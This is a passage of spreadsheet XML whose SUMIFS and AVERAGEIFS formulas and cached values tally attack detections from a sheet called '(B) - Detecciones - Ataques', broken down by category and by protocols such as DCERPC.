        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>6951</v>
      </c>
      <c r="AN29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>114</v>
      </c>
      <c r="AR29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>4</v>
      </c>
      <c r="AS29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>1</v>
      </c>
      <c r="AU29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>2</v>
      </c>
      <c r="AV29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>3</v>
      </c>
      <c r="AW29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>9</v>
      </c>
      <c r="AY29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>2</v>
      </c>
      <c r="BA29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>1</v>
      </c>
      <c r="BB29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>3</v>
      </c>
      <c r="BD29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>1</v>
      </c>
      <c r="BF29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>2</v>
      </c>
      <c r="BG29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>1</v>
      </c>
      <c r="BH29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>1</v>
      </c>
      <c r="BI29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>1</v>
      </c>
      <c r="BJ29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>1</v>
      </c>
      <c r="BK29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>3</v>
      </c>
      <c r="BL29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>1</v>
      </c>
      <c r="BM29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>3292</v>
      </c>
      <c r="BN29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>5180</v>
      </c>
      <c r="BO29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>10</v>
      </c>
      <c r="BR29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>2</v>
      </c>
      <c r="BT29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>1</v>
      </c>
      <c r="BU29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>1</v>
      </c>
      <c r="BW29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>1</v>
      </c>
      <c r="BX29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>2</v>
      </c>
      <c r="BZ29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>123</v>
      </c>
      <c r="CA29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>1</v>
      </c>
      <c r="CC29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>1</v>
      </c>
      <c r="CD29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>1</v>
      </c>
      <c r="CE29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>1</v>
      </c>
      <c r="CG29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>1</v>
      </c>
      <c r="CH29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>1</v>
      </c>
      <c r="CI29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>1</v>
      </c>
      <c r="CJ29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>1</v>
      </c>
      <c r="CK29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>1</v>
      </c>
      <c r="CL29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>5</v>
      </c>
      <c r="CN29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>1</v>
      </c>
      <c r="CO29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>3</v>
      </c>
      <c r="CP29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>2</v>
      </c>
      <c r="CQ29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>1</v>
      </c>
      <c r="CR29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>65839</v>
      </c>
      <c r="CT29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>1002</v>
      </c>
      <c r="CU29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>1</v>
      </c>
      <c r="CW29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>1</v>
      </c>
      <c r="CY29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>2</v>
      </c>
      <c r="CZ29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>2</v>
      </c>
      <c r="DE29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>1</v>
      </c>
      <c r="DF29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>1</v>
      </c>
      <c r="DG29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>450</v>
      </c>
      <c r="DI29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>112</v>
      </c>
      <c r="DJ29" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>11</v>
      </c>
      <c r="DK29" s="271"/>
      <c r="DO29" s="357"/>
      <c r="DP29" s="358" t="s">
        <v>2013</v>
      </c>
      <c r="DQ29" s="359">
        <v>0.0</v>
      </c>
      <c r="DR29" s="359">
        <v>0.0</v>
      </c>
      <c r="DS29" s="359">
        <v>0.0</v>
      </c>
      <c r="DT29" s="359">
        <v>0.0</v>
      </c>
      <c r="DU29" s="360">
        <v>0.0</v>
      </c>
      <c r="DV29" s="271"/>
      <c r="DW29" s="358" t="s">
        <v>2013</v>
      </c>
      <c r="DX29" s="359">
        <v>0.0</v>
      </c>
      <c r="DY29" s="359">
        <v>0.0</v>
      </c>
      <c r="DZ29" s="359">
        <v>0.0</v>
      </c>
      <c r="EA29" s="359">
        <v>0.0</v>
      </c>
      <c r="EB29" s="360">
        <v>0.0</v>
      </c>
      <c r="EC29" s="271"/>
      <c r="ED29" s="280"/>
      <c r="EG29" s="279"/>
      <c r="EH29" s="271"/>
      <c r="EI29" s="358" t="s">
        <v>2013</v>
      </c>
      <c r="EJ29" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AL$3:AL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI29,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!AL$3:AL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S28 &amp; "*")</f>
        <v>0</v>
      </c>
      <c r="EK29" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BX$3:$BX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI29,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!BX$3:BX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EI29 &amp; "*")</f>
        <v>0</v>
      </c>
      <c r="EL29" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!DN$3:DN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI29,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!DN$3:DN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EI29 &amp; "*")</f>
        <v>0</v>
      </c>
      <c r="EM29" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!FD$3:FD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI29,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!FD$3:FD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EI29 &amp; "*")</f>
        <v>0</v>
      </c>
      <c r="EN29" s="360">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="EO29" s="364"/>
      <c r="EP29" s="364"/>
      <c r="EQ29" s="364"/>
      <c r="ER29" s="364"/>
      <c r="ES29" s="364"/>
      <c r="ET29" s="364"/>
      <c r="EU29" s="364"/>
      <c r="EV29" s="379" t="s">
        <v>2013</v>
      </c>
      <c r="EW29" s="380" t="s">
        <v>12</v>
      </c>
      <c r="EX29" s="380" t="s">
        <v>12</v>
      </c>
      <c r="EY29" s="380" t="s">
        <v>12</v>
      </c>
      <c r="EZ29" s="381" t="s">
        <v>12</v>
      </c>
      <c r="FA29" s="367"/>
      <c r="FC29" s="382" t="s">
        <v>2465</v>
      </c>
      <c r="FD29" s="383"/>
      <c r="FE29" s="384">
        <f t="shared" ref="FE29:FH29" si="5">SQRT(FE27*(1-FE28))</f>
        <v>0.08239229012</v>
      </c>
      <c r="FF29" s="384">
        <f t="shared" si="5"/>
        <v>0.2529430296</v>
      </c>
      <c r="FG29" s="384">
        <f t="shared" si="5"/>
        <v>0.3292434956</v>
      </c>
      <c r="FH29" s="385">
        <f t="shared" si="5"/>
        <v>0.2648205106</v>
      </c>
      <c r="FK29" s="303" t="s">
        <v>633</v>
      </c>
      <c r="FL29" s="68">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AP$3:AP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK29,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!AP$3:AP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK29 &amp; "*")</f>
        <v>1</v>
      </c>
      <c r="FM29" s="68">
        <f>SUMIFS('(B) - Detecciones - Ataques'!CB$3:CB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK29,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!CB$3:CB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK29 &amp; "*")</f>
        <v>13</v>
      </c>
      <c r="FN29" s="68">
        <f>SUMIFS('(B) - Detecciones - Ataques'!DR$3:DR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK29,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!DR$3:DR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK29 &amp; "*")</f>
        <v>21</v>
      </c>
      <c r="FO29" s="304">
        <f>SUMIFS('(B) - Detecciones - Ataques'!FH$3:FH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK29,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!FH$3:FH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK29 &amp; "*")</f>
        <v>29</v>
      </c>
      <c r="FQ29" s="303" t="s">
        <v>633</v>
      </c>
      <c r="FR29" s="69">
        <f t="shared" ref="FR29:FU29" si="6">1-(FL29/EJ31)</f>
        <v>0</v>
      </c>
      <c r="FS29" s="69">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="FT29" s="69">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="FU29" s="306">
        <f t="shared" si="6"/>
        <v>0.3095238095</v>
      </c>
      <c r="FY29" s="370" t="s">
        <v>7</v>
      </c>
      <c r="FZ29" s="371">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!DK3:DK139)</f>
        <v>0.2177240228</v>
      </c>
      <c r="GA29" s="371">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!DL3:DL139)</f>
        <v>0.2804878049</v>
      </c>
      <c r="GG29" s="372" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"DCERPC")</f>
        <v>DCERPC</v>
      </c>
      <c r="GH29" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG29)</f>
        <v>0.6666666667</v>
      </c>
      <c r="GI29" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG29)</f>
        <v>0.6666666667</v>
      </c>
      <c r="GJ29" s="373">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG29)</f>
        <v>0.6666666667</v>
      </c>
      <c r="GK29" s="372" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"DCERPC")</f>
        <v>DCERPC</v>
      </c>
      <c r="GL29" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG29)</f>
        <v>0.6666666667</v>
      </c>
      <c r="GM29" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG29)</f>
        <v>0.6666666667</v>
      </c>
      <c r="GN29" s="374">
